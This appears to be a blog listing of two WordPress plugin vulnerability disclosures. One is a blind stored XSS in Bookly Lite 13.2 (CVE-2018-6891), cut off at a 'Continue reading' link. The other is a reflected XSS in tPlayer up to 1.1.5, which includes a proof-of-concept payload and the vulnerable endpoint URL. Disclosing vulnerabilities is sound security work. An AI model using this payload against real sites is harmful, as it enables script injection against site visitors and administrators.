Bookly #1 WordPress Booking Plugin (Lite) 13.2 – Blind Stored XSS

INFO Product: Bookly #1 WordPress Booking Plugin (Lite Version) Version: 13.2 Active installations: 10,000+ Product page: https://wordpress.org/plugins/bookly-responsive-appointment-booking-tool/ CVE: 2018-6891 DESCRIPTION An unauthenticated user can inject arbitrary persistent javascript code in the admin panel. PROOF OF CONCEPT Bookly Lite 13.2 and Bookly Pro 14.5 are affected, probably even earlier versions. I think the problem is that jQuery.ajax request is Continue reading Bookly #1 WordPress Booking Plugin (Lite) 13.2 – Blind Stored XSS

tPlayer – Audio Player for WordPress <= 1.1.5 - Multiple XSS Vulnerabilities

INFO Product: tPlayer – Audio Player for WordPress Version: <= 1.1.5 Product page: https://codecanyon.net/item/tplayer-audio-player-for-wordpress/12005417 DESCRIPTION The GET parameters playlist , autoplay , cm , showPlaylist are vulnerable to unauthenticated reflected cross-site scripting (XSS). PROOF OF CONCEPT XSS Payload: “><svg/onload=confirm`XSS`// https://target/wp-content/plugins/tplayer-html5-audio-player-with-playlist/inc/embed.php?playlist=<XSS Payload>&autoplay=<XSS Payload>&cm=<XSS Payload>&showPlaylist=<XSS Payload> (XSS vulnerabilities found with XSSSonar ❤)